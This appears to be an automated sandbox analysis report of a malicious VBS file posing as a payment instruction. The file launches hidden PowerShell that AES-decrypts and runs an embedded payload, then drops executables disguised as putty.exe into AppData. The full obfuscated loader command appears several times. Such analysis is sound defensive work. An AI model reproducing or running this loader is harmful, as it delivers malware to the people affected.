                Source: Process Memory Space: powershell.exe PID: 6012, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: putty.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: edrecib.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@7/5@4/2
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00541CC0 CreateToolhelp32Snapshot,Module32First,4_2_00541CC0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydy13bbf.zhu.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsReversingLabs: Detection: 21%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\edrecib C:\Users\user\AppData\Roaming\edrecib
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\edrecibSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeUnpacked PE file: 4.2.putty.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\edrecibUnpacked PE file: 7.2.edrecib.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -spl", "0", "true");
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('583A9978E4D34538992E1A1351EF94C76F346575AEA09EB513401549161877EAF16C217FA53FAF8E9F5A6B6C98F436132CD64686F84B385701DF5CB57A496A57D083A739BD167A16F22386779010D0352280C205381DB165BF369C1DDC1AB0B20826DFB010CFDDCDFA3710E79E1F0DF5396A3CDCB1519A0E59214CB85DD8D5DB3598F5C3CC2D2307A104A5856E89829E0A80D0286C7C00A59C9857283FBDB29EB8E496DD4C09DA9F275960328E5AC89D55EBD3DCFED16A96B6882267D9DCBB1521E1A44EEC3CE3DA70C185B6D12547011407D8226CD2AE3CE2F55821F81B446119C95B163DB7DC61D936658509E877C1C06861FB6361BE198E404AE7F361887E373DC1A99E729EA6BCAD34C16C098676CBD7B34C34B4F6155017983594876DAC6BDB2C587F4A232BC97779B63E1A9088C50429F113E053CF31D6547C6D7F0ABE12F1F0B6A3F596803EBE69B5D5A6D1179C28BCAA989E167C59B3FF802844CBD654C0D6740476BF8F45699EB7ADB664C116B89504C4839F998A91C64E5E71E61B29061402831AAC2A34042CD38B595CF64B56303C0B9F31CEFD6C1F6AFD8BEDDEA69D470D2A173FC1496F22674C3559B74CED02F1DCEC4DABB38BA293DA8F762959B7DDA301EEA24D6B450354B04288F6385A2B2EDB10FA89F0D27FF2907D00A53F937FD89AB58F6811A166D5A633234208A16F44C7E1FDA1CA5781750D0FD0698B225A66882E2BC56217A52CCBF79E80ED2ABC2CDC8039511450AF5B112EADDA510CE1EED99D3EBFDAD959AB50B58880B9E56EC313C6B087C011B3DA810C2A5E3C6A90C69061B7B3ECED35C713C11874F6763FA79F0691D4FF8B99159BF1A716F811E9CBB8F818216B8AEF751BF044FBFE9DAA0CB892645C05F5D407EFED774BA5689A68FE5547020C0FE72F39D5ACA4');$mZBMz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4AD200BD pushad ; iretd 2_2_00007FFB4AD200C1
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00401068 push ebp; iretd 4_2_0040106E
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004010B4 push ss; ret 4_2_004010B5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00542816 push ss; ret 4_2_00542817
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00542F0A push es; iretd 4_2_00542F0B
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054922C push esi; retf 4_2_0054922D
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005427CA push ebp; iretd 4_2_005427D0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054478C push ebx; ret 4_2_00544792
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00546CA2 push ds; ret 4_2_00546CB5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005F111B push ss; ret 4_2_005F111C
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005F18DC push es; iretd 4_2_005F18DD
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005F10CF push ebp; iretd 4_2_005F10D5
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00401068 push ebp; iretd 7_2_0040106E
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_004010B4 push ss; ret 7_2_004010B5
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00542816 push ss; ret 7_2_00542817
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00542F0A push es; iretd 7_2_00542F0B
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_0054922C push esi; retf 7_2_0054922D
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005427CA push ebp; iretd 7_2_005427D0
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_0054478C push ebx; ret 7_2_00544792
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_00546CA2 push ds; ret 7_2_00546CB5
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005B111B push ss; ret 7_2_005B111C
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005B18DC push es; iretd 7_2_005B18DD
                Source: C:\Users\user\AppData\Roaming\edrecibCode function: 7_2_005B10CF push ebp; iretd 7_2_005B10D5
                Source: putty.exe.2.drStatic PE information: section name: .text entropy: 7.7876604645270575
                Source: edrecib.5.drStatic PE information: section name: .text entropy: 7.7876604645270575
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\edrecibJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\edrecibJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\edrecib:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
